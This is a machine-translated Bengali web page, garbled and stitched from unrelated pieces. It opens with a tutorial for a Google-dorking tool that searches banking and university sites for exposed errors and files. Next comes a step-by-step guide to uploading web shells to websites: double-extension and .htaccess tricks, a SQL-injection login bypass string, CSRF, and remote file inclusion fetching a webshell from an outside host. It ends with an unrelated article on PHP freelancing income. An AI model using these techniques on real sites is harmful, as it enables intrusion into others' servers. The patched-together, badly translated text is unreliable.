ফলাফলটি একটি ফাইলে সংরক্ষণ করুন (শুধুমাত্র সেই ট্র্যাকগুলি সংরক্ষণ করা হবে যার জন্য কিছু পাওয়া গেছে) |
ghdb কমান্ড ব্যবহার করে, আপনি নির্বিচারে অনুরোধের মাধ্যমে exploit-db থেকে সমস্ত ডর্ক পেতে পারেন, বা সম্পূর্ণ বিভাগ নির্দিষ্ট করতে পারেন। আপনি যদি বিভাগ 0 উল্লেখ করেন, পুরো ডাটাবেসটি আনলোড করা হবে (প্রায় 4.5 হাজার ডর্ক)।
বর্তমানে উপলব্ধ বিভাগের তালিকা চিত্র 2-এ উপস্থাপন করা হয়েছে।
চিত্র 2 - উপলব্ধ GHDB ডর্ক বিভাগের তালিকা
গুগল টিম প্রতিটি ডর্ককে গুগল সার্চ ইঞ্জিনে প্রতিস্থাপন করবে এবং ম্যাচের ফলাফল বিশ্লেষণ করবে। পাথ যেখানে কিছু পাওয়া গেছে একটি ফাইল সংরক্ষণ করা হবে.
ইউটিলিটি বিভিন্ন অনুসন্ধান মোড সমর্থন করে:
1 ডর্ক এবং 1 সাইট;
1 ডর্ক এবং অনেক সাইট;
1 সাইট এবং অনেক dorks;
অনেক সাইট এবং অনেক dorks;
ডর্ক এবং সাইটের তালিকা একটি যুক্তি বা একটি ফাইলের মাধ্যমে নির্দিষ্ট করা যেতে পারে।
কাজের প্রদর্শনী
আসুন ত্রুটি বার্তাগুলির জন্য অনুসন্ধানের উদাহরণ ব্যবহার করে যে কোনও দুর্বলতাগুলি সন্ধান করার চেষ্টা করি৷ কমান্ড দ্বারা: dorks ghdb –c 7 –o errors.dorks "ত্রুটির বার্তা" বিভাগের সমস্ত পরিচিত ডর্কগুলি চিত্র 3-এ দেখানো হিসাবে লোড করা হবে।
চিত্র 3 - "ত্রুটির বার্তা" বিভাগের সমস্ত পরিচিত ডর্ক লোড করা হচ্ছে
Dorks ডাউনলোড এবং একটি ফাইল সংরক্ষণ করা হয়. এখন যা অবশিষ্ট থাকে তা হল সেগুলিকে কিছু সাইটে "সেট" করা (চিত্র 4 দেখুন)।
চিত্র 4 – গুগল ক্যাশে আগ্রহের সাইটের দুর্বলতা অনুসন্ধান করুন
কিছু সময়ের পরে, অধ্যয়নের অধীনে সাইটে ত্রুটিযুক্ত বেশ কয়েকটি পৃষ্ঠা আবিষ্কৃত হয় (চিত্র 5 দেখুন)।
চিত্র 5 – ত্রুটি বার্তা পাওয়া গেছে
ফলস্বরূপ, result.txt ফাইলে আমরা ডর্কের একটি সম্পূর্ণ তালিকা পাই যা ত্রুটির দিকে নিয়ে যায়।
চিত্র 6 সাইটের ত্রুটির জন্য অনুসন্ধানের ফলাফল দেখায়।
চিত্র 6 – ত্রুটি অনুসন্ধান ফলাফল
এই ডর্কের ক্যাশে, একটি সম্পূর্ণ ব্যাকট্রেস প্রদর্শিত হয়, যা স্ক্রিপ্টের নিখুঁত পথ, সাইটের বিষয়বস্তু ব্যবস্থাপনা সিস্টেম এবং ডাটাবেসের প্রকার (চিত্র 7 দেখুন) প্রকাশ করে।
চিত্র 7 – সাইট ডিজাইন সম্পর্কে তথ্য প্রকাশ
যাইহোক, এটি বিবেচনা করা উচিত যে জিএইচডিবি থেকে সমস্ত ডর্ক সত্য ফলাফল দেয় না। এছাড়াও, Google একটি সঠিক মিল খুঁজে নাও পেতে পারে এবং একটি অনুরূপ ফলাফল দেখাতে পারে।
এই ক্ষেত্রে, আপনার ডর্কের ব্যক্তিগত তালিকা ব্যবহার করা বুদ্ধিমানের কাজ। উদাহরণস্বরূপ, "অস্বাভাবিক" এক্সটেনশন সহ ফাইলগুলি সন্ধান করা সর্বদা মূল্যবান, যার উদাহরণ চিত্র 8 এ দেখানো হয়েছে।
চিত্র 8 – ফাইল এক্সটেনশনের তালিকা যা নিয়মিত ওয়েব রিসোর্সের জন্য সাধারণ নয়
ফলস্বরূপ, dorks google –D extensions.txt –f bank কমান্ডের মাধ্যমে, প্রথম অনুরোধ থেকেই Google “অস্বাভাবিক” ফাইল এক্সটেনশন সহ সাইটগুলি ফেরত দিতে শুরু করে (চিত্র 9 দেখুন)।
চিত্র 9 - ব্যাঙ্কিং ওয়েবসাইটে "খারাপ" ফাইলের ধরন অনুসন্ধান করুন৷
এটা মনে রাখা উচিত যে Google 32 শব্দের বেশি প্রশ্ন গ্রহণ করে না।
dorks google –d intext:”error|warning|notice|syntax” –f University কমান্ড ব্যবহার করে
আপনি শিক্ষামূলক ওয়েবসাইটগুলিতে PHP দোভাষী ত্রুটিগুলি সন্ধান করতে পারেন (চিত্র 10 দেখুন)।
চিত্র 10 - পিএইচপি রানটাইম ত্রুটি খুঁজে বের করা
কখনও কখনও এক বা দুটি বিভাগের ডর্ক ব্যবহার করা সুবিধাজনক নয়।
উদাহরণস্বরূপ, যদি এটি জানা যায় যে সাইটটি Wordpress ইঞ্জিনে চলে, তাহলে আমাদের ওয়ার্ডপ্রেস-নির্দিষ্ট মডিউল প্রয়োজন। এই ক্ষেত্রে, গুগল হ্যাক ডেটাবেস অনুসন্ধান ব্যবহার করা সুবিধাজনক। dorks ghdb –q wordpress –o wordpress_dorks.txt কমান্ডটি Wordpress থেকে সমস্ত dorks ডাউনলোড করবে, যেমন চিত্র 11-এ দেখানো হয়েছে:
চিত্র 11 – Wordpress এর সাথে সম্পর্কিত Dorks অনুসন্ধান করুন
আসুন আবার ব্যাঙ্কগুলিতে ফিরে যাই এবং ওয়ার্ডপ্রেস সম্পর্কিত আকর্ষণীয় কিছু খুঁজে বের করার চেষ্টা করতে dorks google –D wordpress_dords.txt –f bank কমান্ডটি ব্যবহার করি (চিত্র 12 দেখুন)।
চিত্র 12 – ওয়ার্ডপ্রেস দুর্বলতার জন্য অনুসন্ধান করুন
এটা লক্ষনীয় যে গুগল হ্যাক ডাটাবেসের অনুসন্ধান 4 অক্ষরের চেয়ে ছোট শব্দ গ্রহণ করে না। যেমন সাইটটির CMS জানা না থাকলেও ভাষা জানা থাকলে- PHP। এই ক্ষেত্রে, আপনি পাইপ এবং সিস্টেম সার্চ ইউটিলিটি ডর্কস –c all | findstr /I php > php_dorks.txt (চিত্র 13 দেখুন):
চিত্র 13 - যেখানে পিএইচপি উল্লেখ করা হয়েছে সেখানে সমস্ত ডর্ক অনুসন্ধান করুন
একটি সার্চ ইঞ্জিনে দুর্বলতা বা কিছু সংবেদনশীল তথ্য অনুসন্ধান করা শুধুমাত্র তখনই করা উচিত যদি এই সাইটে একটি উল্লেখযোগ্য সূচক থাকে৷ উদাহরণস্বরূপ, যদি একটি সাইটে 10-15 পৃষ্ঠাগুলি সূচিত করা হয়, তাহলে এইভাবে কিছু অনুসন্ধান করা বোকামি। সূচকের আকার পরীক্ষা করা সহজ - শুধু Google অনুসন্ধান বারে "site:somesite.com" লিখুন৷ একটি অপর্যাপ্ত সূচক সহ একটি সাইটের উদাহরণ চিত্র 14 এ দেখানো হয়েছে।
চিত্র 14 – সাইটের সূচকের আকার পরীক্ষা করা হচ্ছে
এখন অপ্রীতিকর সম্পর্কে... সময়ে সময়ে Google একটি ক্যাপচা অনুরোধ করতে পারে - এটি সম্পর্কে আপনি কিছুই করতে পারবেন না - আপনাকে এটি লিখতে হবে৷ উদাহরণস্বরূপ, যখন "ত্রুটি বার্তা" বিভাগের মাধ্যমে অনুসন্ধান করা হয় (90 ডর্ক), ক্যাপচা শুধুমাত্র একবার উপস্থিত হয়৷
এটি যোগ করা মূল্যবান যে ফ্যান্টমজেস HTTP এবং সক্স ইন্টারফেসের মাধ্যমে প্রক্সির মাধ্যমে কাজ করতেও সমর্থন করে। প্রক্সি মোড সক্ষম করতে, আপনাকে dorks.bat বা dorks.sh-এ সংশ্লিষ্ট লাইনটি আনকমেন্ট করতে হবে।
টুল সোর্স কোড হিসাবে উপলব্ধ
এই নিবন্ধে আমি একটি ওয়েবসাইটে একটি শেল আপলোড করার সর্বাধিক ব্যবহৃত পদ্ধতি সম্পর্কে কথা বলতে চাই। ওয়েব শেলএক ধরনের ক্ষতিকারক স্ক্রিপ্ট (প্রোগ্রাম) যা আক্রমণকারীরা ওয়েবসাইট বা সার্ভার নিয়ন্ত্রণ করতে ব্যবহার করে।
পদ্ধতি 1
ফাইল/ছবি আপলোড করার জন্য ওয়েবসাইটে একটি ফর্ম খুঁজুন। ধরা যাক আমরা সাইটের অ্যাডমিন প্যানেল হ্যাক করতে পারিনি এবং আমরা আমাদের শেলকে প্লাবিত করার চেষ্টা করছি extension.php.jpgসফল হলে, আমরা ছবির পরিবর্তে একটি সাদা উইন্ডো দেখতে পাব, আমরা ডান-ক্লিক করুন এবং লিঙ্কটি অনুসরণ করুন। ব্যর্থতার ক্ষেত্রে, আমরা ক্রোম এক্সটেনশন ব্যবহার করতে পারি তথ্য টেম্পার. এটি আপনাকে আপনার ইচ্ছামত অনুরোধটি আটকাতে এবং পরিবর্তন করতে দেয়। যদি সাইটটি ফাইল এক্সটেনশন চেক করে, তাহলে প্রথমে আমরা আপলোড করতে পারি htaccessবিষয়বস্তু সহ ফাইল:
AddType অ্যাপ্লিকেশন/x-httpd-php .jpg
এই কমান্ডটি php হিসাবে jpg ফাইলগুলি চালাবে।
বিস্তারিত ভিডিও নির্দেশাবলী:
জন্য ভিডিও নির্দেশাবলী ট্যাম্পার ডেটা ইনস্টলেশন:
পদ্ধতি 2
সাইটে অ্যাডমিন প্যানেল অনুসন্ধান করতে প্রোগ্রামটি ব্যবহার করুন - https://github.com/bdblackhat/admin-panel-finder। যখন প্রোগ্রামটি অ্যাডমিন প্যানেল খুঁজে পেয়েছে, আমরা sql-ইনজেকশন চেষ্টা করতে পারি। সাইটের লগইন এবং পাসওয়ার্ড ক্ষেত্রে আমরা কোড লিখি:
" বা "1"="1" বা 1=1/*
যদি এটি কাজ করে, তাহলে আমরা অ্যাডমিন প্যানেল এবং পেতে আমরা পদ্ধতি 1 অনুযায়ী এগিয়ে যাই।যদি সাইটে অ্যাডমিন প্যানেলে কোন sql-ইনজেকশন না থাকে, তাহলে আমরা এটি ডিবাগ করার চেষ্টা করতে পারি বা এই CMS-এর জন্য একটি শোষণ খুঁজে পেতে পারি।
বিস্তারিত ভিডিও নির্দেশাবলী:
পদ্ধতি 3
পদ্ধতি 3-এ আমরা সাইটে নিজেই sql-ইনজেকশন খুঁজব। আমরা এটি ম্যানুয়ালি করতে পারি বা sqlmap ব্যবহার করতে পারি। ইনজেকশনগুলি কীভাবে চালাতে হয় সে সম্পর্কে ফোরামে যথেষ্ট বিষয় রয়েছে, তাই আমি দূর থেকে আসব। সুতরাং, এখন আমরা ইতিমধ্যে প্রশাসকের লগইন এবং পাসওয়ার্ড সহ একটি টেবিল খুঁজে পেয়েছি, হ্যাশগুলি ডিক্রিপ্ট করুন, অ্যাডমিন প্যানেলে যান এবং আনন্দ করুন। তবে ধরা যাক আমরা পাসওয়ার্ডটি ডিক্রিপ্ট করতে পারিনি এবং সবকিছু ভুল হয়ে গেছে, তাহলে আমাদের ব্যবহারকারীর সুবিধাগুলি পরীক্ষা করতে হবে . আমরা সুবিধাগুলি পরীক্ষা করি এবং মিনি-শেল লোড করি। কিছু কারণে, যখন আমি কোড পেস্ট করতে চাই, সাইটটি আমাকে একটি ত্রুটি দেয়।
পদ্ধতি 4
পদ্ধতি 4 একটি csrf আক্রমণ জড়িত। নীচের কোডে আমাদের প্রতিস্থাপন করতে হবে http://আমাদের লক্ষ্য লিঙ্কে। শেল নির্বাচন করুনএবং বোতাম টিপুন আপলোড
পদ্ধতি 5
আপনার লক্ষ্য সম্পর্কে আরও জানুন এবং একটি শোষণ খুঁজুন। এর জন্য একটি খুব আকর্ষণীয় ওয়েবসাইট রয়েছে - https://www.exploit-db.com। কেউ দুর্বলতার মাধ্যমে ওয়েবসাইটগুলির ব্যাপক হ্যাকিং বাতিল করেনি, তবে ফর্মটিতে ইতিমধ্যেই এই সম্পর্কে একটি নিবন্ধ রয়েছে৷
একটি শেল পূরণ করার আরও অনেক উপায় আছে এবং প্রতিটি সম্পর্কে কথা বলার কোন মানে নেই। আপনি যদি অনুশীলন করতে চান, তাহলে dvwa ইনস্টল করুন - এটি একটি আইনি পরিবেশে নিরাপত্তা পেশাদারদের তাদের দক্ষতা এবং সরঞ্জামগুলি পরীক্ষা করতে সহায়তা করার জন্য ডিজাইন করা একটি প্রোগ্রাম৷
পদ্ধতি 6
পিএইচপি ইনজেকশন- এটি একটি ওয়েবসাইটে আক্রমণের একটি ফর্ম যখন আক্রমণকারী তার পিএইচপি কোডটি আক্রমণ করা পিএইচপি অ্যাপ্লিকেশনে ইনজেক্ট করে।
www.site.ru?page=home.html
কমান্ডটি কার্যকর করার মাধ্যমে আমরা হোম, এইচটিএমএল পেজ লোড করব। এখন আমরা একটি দূষিত শেল লোড করার চেষ্টা করব।
www.site.ru?page=http:/hacker.ru/webshell.php
ডর্ক: Inurl:পৃষ্ঠা=
পার্ল ব্যবহার করে ইতিমধ্যে লোড করা শেল খুঁজে পাওয়ার একটি উপায়ও রয়েছে
»
কীভাবে একজন পিএইচপি প্রোগ্রামার ঘরে বসে ভাল অর্থ উপার্জন করতে পারে?
বেশিরভাগ সফল পিএইচপি প্রোগ্রামাররা বাড়ি থেকে ভাল অর্থ উপার্জন করে। যে কোনো আয়ের শুরুতে অসুবিধা দেখা দেয়। এটি ঘটে যে অসুবিধা এবং উপার্জনের পদ্ধতি সম্পর্কে জ্ঞানের অভাব বাড়িতে অর্থ উপার্জনের সমস্ত ইচ্ছাকে নিরুৎসাহিত করে এবং তারপরে প্রোগ্রামাররা অফিসে কাজ করার সুযোগ সন্ধান করে, যেখানে একটি বড় গ্যারান্টি রয়েছে যে প্রতি মাসে অর্থ পাওয়া যেতে পারে এবং পেশাদার বৃদ্ধি হয় সম্ভব.
তবে বাড়ি থেকে কাজ করতে সক্ষম হওয়ার অসুবিধার চেয়ে বেশি সুবিধা রয়েছে।
পেশাদার
আপনি নিজের জন্য কাজ করবেন। কেউ আপনাকে বরখাস্ত করবে না, আপনি আপনার নিজের সময়সূচী বা আপনার ইচ্ছামত কাজ বিতরণ করতে সক্ষম হবেন।
আপনি নিজের জন্য প্রোগ্রামিং ব্যবহার করে অর্থ উপার্জনের একটি উপায় চয়ন করেন, যা প্রথমত, কাজের প্রতি আপনার আগ্রহ বাড়াবে এবং দ্বিতীয়ত, আপনার কর্মের মহান স্বাধীনতা রয়েছে। আপনি পছন্দ করেন না এমন কিছু নিয়ে কাজ করতে হবে না। অর্থ উপার্জনের উপায়গুলি একত্রিত করার আরও সুযোগ রয়েছে।
মাইনাস
এটি প্রথমে কঠিন হবে এবং আপনার কাজের জন্য প্রথম অর্থ পেতে আপনাকে অনেক প্রচেষ্টা এবং সময় বিনিয়োগ করতে হবে। এবং সেখানে লাভের জন্য, আপনাকে অবশ্যই ক্রমাগত বিকাশ করতে হবে এবং ধৈর্য ধরতে হবে এবং আপনার সময়সূচীকে সঠিকভাবে বিতরণ করতে হবে যাতে সময়মতো কাজটি সম্পূর্ণ করার জন্য আপনার যথেষ্ট সময় থাকে।
আপনার স্ক্রিপ্ট থেকে অর্থ উপার্জন
ইন্টারনেটে অনেকগুলি বিভিন্ন স্ক্রিপ্ট রয়েছে যা লোকেরা সহজেই তাদের ওয়েবসাইটে ডাউনলোড এবং ইনস্টল করতে পারে। আপনি আপনার নিজের অনন্য স্ক্রিপ্ট লিখতে পারেন, এবং কিভাবে আপনি আপনার স্ক্রিপ্ট থেকে অর্থ উপার্জন করতে পারেন তার জন্য দুটি বিকল্প রয়েছে। এটি বিক্রি করুন বা ফাইল শেয়ারিং পরিষেবার মাধ্যমে পোস্ট করুন। আপনি দুটি বিকল্প ব্যবহার করতে পারেন। উদাহরণস্বরূপ, হালকা স্ক্রিপ্টগুলি, তবে একই সাথে ফাইল শেয়ারিং পরিষেবাগুলির মাধ্যমে ঠিক সেই স্ক্রিপ্টগুলি স্থাপন করাও খুব গুরুত্বপূর্ণ যেগুলির প্রচুর চাহিদা থাকবে। এটি করার জন্য, স্ক্রিপ্টগুলির চাহিদা থাকা আবশ্যক যাতে লোকেরা তাদের প্রয়োজনে সেগুলি ডাউনলোড করে।
বড় স্ক্রিপ্ট যুক্তিসঙ্গত মূল্য জন্য বিক্রি করা যেতে পারে. আপনি ফোরামে একটি বিজ্ঞাপন পোস্ট করতে পারেন, অথবা আপনার নিজের ব্যক্তিগত ব্লগ বা ওয়েবসাইট থাকলে, স্ক্রিপ্ট বিক্রির জন্য একটি বিজ্ঞাপন দিন।
যাই হোক না কেন, আপনি যে বিকল্পটি চয়ন করুন না কেন, আর্কাইভে স্ক্রিপ্টটি রাখুন এবং আপনার সম্পর্কে বিস্তারিত নির্দেশাবলী এবং যোগাযোগের তথ্য অন্তর্ভুক্ত করতে ভুলবেন না। সহায়তা প্রদান করতে ভুলবেন না, কারণ নিজের জন্য কাজ করা আপনার জন্য গুরুত্বপূর্ণ। সর্বোপরি, আপনাকে সুপারিশ করা দরকার বা আপনার স্ক্রিপ্টগুলি ডাউনলোড করা দরকার। তারা উচ্চ মানের হতে হবে. যদি একজন ব্যক্তি আপনাকে সাহায্যের জন্য জিজ্ঞাসা করেন, বিনয়ের সাথে তাকে স্ক্রিপ্ট সম্পর্কে ব্যাখ্যা করুন বা তাকে এটি ইনস্টল করতে সাহায্য করুন। আপনার স্ক্রিপ্ট মন্তব্য থাকতে হবে. প্রতিটি ফাংশন কি জন্য দায়ী, ইত্যাদি সর্বোপরি, একজন ব্যক্তি সহজেই আপনার কোডে বিভ্রান্ত হতে পারেন, যেখানে কোনও নোটেশন নেই।
নিজস্ব এবং যৌথ প্রকল্প
সফলভাবে অর্থোপার্জনের জন্য আপনার নিজস্ব ওয়েবসাইট তৈরি করা ভাল। আপনার ওয়েবসাইট দিয়ে অর্থ উপার্জন করার অনেক সুযোগ রয়েছে। আপনি যদি এটি ভালভাবে প্রচার করেন, আপনি সেখানে স্ক্রিপ্ট বিক্রির জন্য পোস্ট করতে পারেন। সহযোগিতামূলক প্রকল্পগুলি আপনার ক্ষমতাকে প্রসারিত করবে, যা হোম প্রোগ্রামিং সাফল্যের জন্য ভাল। অতএব, অংশীদারদের সন্ধান করুন বা একসাথে একটি প্রকল্প তৈরি করার প্রস্তাব প্রত্যাখ্যান করবেন না।
আপনি আপনার ওয়েবসাইটে মনোযোগ আকর্ষণ যে বৈশিষ্ট্য যোগ করতে ভুলবেন না. সাইট একটি নিয়মিত, সহজ চেহারা থাকতে পারে, কিন্তু একই সময়ে তার নিজস্ব মোচড় সঙ্গে। একটি ব্যক্তিগত ওয়েবসাইট ক্লায়েন্ট বাড়াতে সাহায্য করে। তারা দেখতে পাবে যে আপনার স্ক্রিপ্টগুলি কীভাবে কাজ করে, যদি সেগুলি লোড হতে খুব বেশি সময় না নেয়, ব্যবহার করার জন্য আকর্ষণীয় এবং সবচেয়ে গুরুত্বপূর্ণ, আসল, অন্য কিছুর বিপরীতে। তাহলেই আপনি সফলতা পাবেন।
অর্ডার উপর উপার্জন
এটি করতে, ফ্রিল্যান্সারদের জন্য বিভিন্ন এক্সচেঞ্জে নিবন্ধন করুন এবং অর্ডারগুলি সন্ধান করুন। আপনার সম্পন্ন কাজের পোর্টফোলিও প্রদর্শন করুন। তবে সতর্ক থাকুন, পৃথিবীতে অসৎ লোক আছে এবং আপনি যাতে প্রতারণার শিকার না হন, প্রথমে আপনার সার্ভারে অবস্থিত কাজটি দেখান (যাইহোক, এই ক্ষেত্রে আপনাকে একটি vps ভাড়া নিতে হবে http:// /nkvd.pro/vps/), এবং তারপরে যদি তারা আপনাকে অংশ দেয়, তাহলে অর্ধেক তাদের সার্ভারে স্থানান্তর করুন এবং দ্বিতীয় অংশের সাথে একই কাজ করুন। অর্থ উপার্জনের এই পদ্ধতিটি লাভজনক বলে মনে করা হয়, তবে আপনার জ্ঞান এবং দক্ষতার ডিগ্রির উপর নির্ভর করে। এটি আপনার গ্রাহকদের প্রতিক্রিয়ার উপরও নির্ভর করে। অর্থ উপার্জনের এই পদ্ধতিতে সফল হতে, সততার সাথে এবং দক্ষতার সাথে কাজটি করুন। আপনাকে অবশ্যই গ্রাহকদের সাথে যোগাযোগ করতে সক্ষম হতে হবে, আপনি কী করতে পারেন এবং কী করতে পারবেন না তা স্পষ্টভাবে ব্যাখ্যা করতে হবে।
এটি কোনও পিএইচপি প্রোগ্রামারের উপার্জনের সম্পূর্ণ তালিকা নয়, তবে অর্থ উপার্জনের এই পদ্ধতিগুলির জন্য ধন্যবাদ, যা উপরে লেখা আছে, আপনি ইতিমধ্যে বাড়ি ছাড়াই অর্থ উপার্জন করতে পারেন। প্রাথমিক পর্যায়ে এটি একটি বড় অর্জন হবে। মূল জিনিসটি সেখানে থামানো নয়। ক্রমাগত উন্নতি করুন এবং এমন প্রকল্পগুলি তৈরি করুন যা আপনাকে কেবল ভাল আয়ই নয়, আনন্দও আনবে।
লেখক সম্পর্কে
কীভাবে একজন পিএইচপি প্রোগ্রামার ঘরে বসে ভাল অর্থ উপার্জন করতে পারে?